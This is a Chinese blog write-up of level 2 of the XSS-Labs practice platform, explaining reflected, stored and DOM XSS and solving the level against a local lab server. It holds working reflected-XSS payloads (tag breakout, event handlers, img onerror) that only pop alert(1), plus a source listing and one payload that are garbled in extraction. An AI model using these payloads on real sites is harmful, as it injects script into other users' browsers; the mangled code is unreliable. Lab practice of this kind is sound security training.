XSS之xss-labs-level2

文章目录

  • 0x01 XSS-Labs
  • 0x02 实验工具
  • 0x03 实验环境
  • 0x04 实验步骤
  • 0x05 实验分析
  • 0x06 参考链接

0x01 XSS-Labs

  XSS(跨站脚本攻击)是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该网页或请求该网页中的内容之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。

  XSS按照利用方式主要分为:反射型XSS、存储型XSS、DOM型XSS。反射型XSS是攻击者事先制作好攻击链接, 需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的页面和内容),一般容易出现在搜索页面。代码是存储在服务器中的,如在个人信息或发表文章等地方,加入代码,如果没有过滤或过滤不严,那么这些代码将储存到服务器中,每当有用户访问该页面的时候都会触发代码执行,这种XSS即存储型XSS,非常危险,容易造成蠕虫,大量盗窃cookie。客户端的脚本程序可以通过DOM动态地检查和修改页面内容,它不依赖于提交数据到服务器端,而从客户端获得DOM中的数据在本地执行,如果DOM中的数据没有经过严格确认,就会产生DOM XSS漏洞

  XSS-Labs是使用PHP编写的一个XSS漏洞练习平台,一共包含20关,其主要为反射型XSS,可以练习基础XSS的过滤和绕过技巧,且每一关的后台源码都重写了alert()方法,只要成功弹框即可调用重写的alert()方法进入下一关或完成本关测试。

0x02 实验工具

  • FireFox
  • HackBar

0x03 实验环境

  • 服务器:Windows Server 2008
  • 中间件:Apache
  • 客户端:Windows 10

实验界面如下图所示:

0x04 实验步骤

  1. 使用如下payload进行测试,查看参数的回显位置以及是否被转义或过滤。

    http://10.10.10.148:8203/level2.php?keyword=<script>alert(1)</script>
    

    由上述操作可以推断,程序对h2标签的参数进行了转义,而对name=keywordinput标签中的参数未进行转义,闭合value值和input标签就可以正常弹窗,所以此处存在XSS漏洞。

  2. 构造如下所示的payload进行漏洞测试,结果如下图所示。

    // 闭合标签+payload+注释
    http://10.10.10.148:8203/level2.php?keyword="><script>alert(1)</script>//
    
  3. 代码审计。程序源码如下所示:

    <!DOCTYPE html><!--STATUS OK--><html>
    <head>
    <meta http-equiv="content-type" content="text/html;charset=utf-8">
    <script>
    window.alert = function()  
    {     
    confirm("完成的不错!");
     window.location.href="level3.php?writing=wait"; 
    }
    </script>
    <title>欢迎来到level2</title>
    </head>
    <body>
    <h1 align=center>欢迎来到level2</h1>
     
    ini_set("display_errors", 0);
    $str = $_GET["keyword"];
    echo "

    没有找到和".htmlspecialchars($str)."相关的结果.

    "
    .'
    .$str.'">
    '
    ; ?> <center><img src=level2.png></center> echo "

    payload的长度:".strlen($str)."

    "
    ; ?> </body> </html>
    • 由18行代码可知:GET方法得到的参数经过htmlspecialchars()函数转义后回显到HTML页面中。
    • 由17、20行代码可知:程序将通过GET方法得到的参数未经任何转义或过滤直接赋值给name=keywordinput标签的value值。
  4. 所以闭合标签或构造事件后可以成功调用alert()方法的脚本都可以做为payload。

0x05 实验分析

  • 程序未做任何转义或过滤就将参数回显到HTML页面中,所以此关的payload非常多:

    # 构造事件
    "οnclick="alert(1)
    # 闭合原有标签,构造脚本
    "><script>alert(1)</script>//
    # 闭合原有标签,构造事件
    "><img src=x onerror=alert(1)>//
    # 闭合原有标签,构造伪协议
    ">:alert(1)">a</a>
    ...
    

0x06 参考链接

  • 跨站脚本漏洞基础讲解

你可能感兴趣的:(#,靶场,靶场,XSS)